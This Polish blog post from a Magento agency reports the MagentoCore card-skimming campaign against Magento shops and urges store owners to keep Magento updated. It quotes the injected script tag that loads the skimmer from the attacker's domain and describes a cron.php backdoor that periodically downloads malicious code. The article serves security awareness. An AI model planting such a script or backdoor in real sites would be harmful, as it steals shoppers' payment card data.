Jesteś tutaj: / / / Dlaczego aktualizacja Magento jest tak istotna?

Dlaczego aktualizacja Magento jest tak istotna?

Magento
11.09.2018 Angelika Siczek
koniec wsparcia akeneo 4.0 i nowości w wersji 5.0

W przeciągu pół roku przestępcy umieścili szkodliwe skrypty na ponad 7 tysiącach sklepów opartych o silnik Magento. W wyniku tego procederu hakerzy kradli dane kart płatniczych klientów, zyskując dostęp do pieniędzy na kontach bankowych.

aktualizacja magento

Według eksperta Willema de Groota, który odkrył zagrożenie jest to najbardziej agresywny skrypt tego typu powstały do tej pory w przypadku Magento. Hakerzy zainfekowali już 7 339 sklepów Magento skimerem o nazwie MagentoCore, który pobiera dane z kart płatniczych od użytkowników, którzy kupili na tych stronach. Szkodliwy skrypt ładuje się na strony kasowe sklepu i kradnie dane karty płatniczej dostarczone przez użytkowników i wysyła je na serwer kontrolowany przez atakującego. Willem de Groot poinformował, że kampania hakerska obejmuje skimmer skrypt załadowany z domeny magentocore.net.

Kampania wciąż trwa, a hakerzy atakują nowe sklepy Magento w tempie od 50 do 60 stron dziennie. Wśród zainfekowanych sklepów są również firmy notowane na giełdzie obracające milionowymi kwotami. 1450 spośród ponad 7339 zainfekowanych sklepów opartych o platformę Magento miało przez pół roku w kodzie umieszczony szkodliwy skrypt. W tym czasie zaatakowane serwisy nie zareagowały na wyciek danych. Reszcie sklepów zajmowało to średnio kilka tygodni.

Gdy atakującemu uda się złamać kod strony dodaje do szablonu HTML osadzony fragment kodu JavaScript:

<script type=”text/javascript” src=”hxxps://magentocore.net/mage/mage.js”></script>

Skrypt ma za zadanie rejestrować składanie zamówień przez klientów i wysyła je na serwer „magentocore.net”. Złośliwe oprogramowanie dodaje backdoor do cron.php, który będzie okresowo pobierał szkodliwy kod, a po uruchomieniu usuwał się sam. Według Bleeping Computer, w którym cytowany jest Yonathan Klijnsma, Badacz ds. Zagrożenia dla RiskIQ, kampania MagentoCore jest częścią większej kampanii kradzieży kart zwanej MageCart, która była aktywna od końca 2015 roku.

Według de Groota, obecnie 4,2% wszystkich sklepów Magento jest zainfekowanych jednym lub większą liczbą skimmerów.

Cyfrowe newsy / Bądź na bieżąco

Od początku 2022 roku wchodzimy w skład Unity Group. Teraz zapisując się do naszego newslettera, będziesz na bieżąco z informacjami całej naszej organizacji.

    Wypełniając formularz wyrażasz zgodę na wysyłkę newslettera przez Unity S.A. z siedzibą we Wrocławiu. Zgodę możesz wycofać w każdej chwili. Więcej informacji na ten temat znajdziesz w naszej polityce prywatności.

    *Wymagane

    Andrzej-kurs-programowania

    Andrzej Szylar

    Chief Executive Officer

    E-mail:

    andrzej.szylar@unitygroup.com
    Magda2

    Magdalena Paczyńska-Kamienik

    HR Manager

    E-mail:

    magdalena.paczynska@unitygroup.com
    Aleksandra

    Aleksandra Bielawska-Clegg

    HR Business Partner

    E-mail:

    aleksandra.bielawska@unitygroup.com

    Michal

    Michał Duława

    New Business Developer

    E-mail:

    michal.dulawa@unitygroup.com

    Katarzyna

    Katarzyna Zajchowska

    Marketing Partner

    E-mail:

    katarzyna.zajchowska@unitygroup.com

    USŁUGI

    Adobe Commerce

    Magento

    AWS

    Akeneo

    Pimcore

    Projektowanie UX / UI

    FIRMA

    Usługi

    Realizacje

    Kariera

    Blog

    O nas

    Kontakt

    Polityka prywatności

    Jesteśmy do Twojej dyspozycji od poniedziałku do piątku:

    8:00 – 16:00

    ul. Strzegomska 2-4
    53-611 Wrocław

    NIP 8992786490
    KRS 0000608120
    REGON 363987723

    Global4Net Sp. z o. o.
    +48 71 358 41 00

    © 2009 – Global4Net. All Rights Reserved.

    bgimage-footer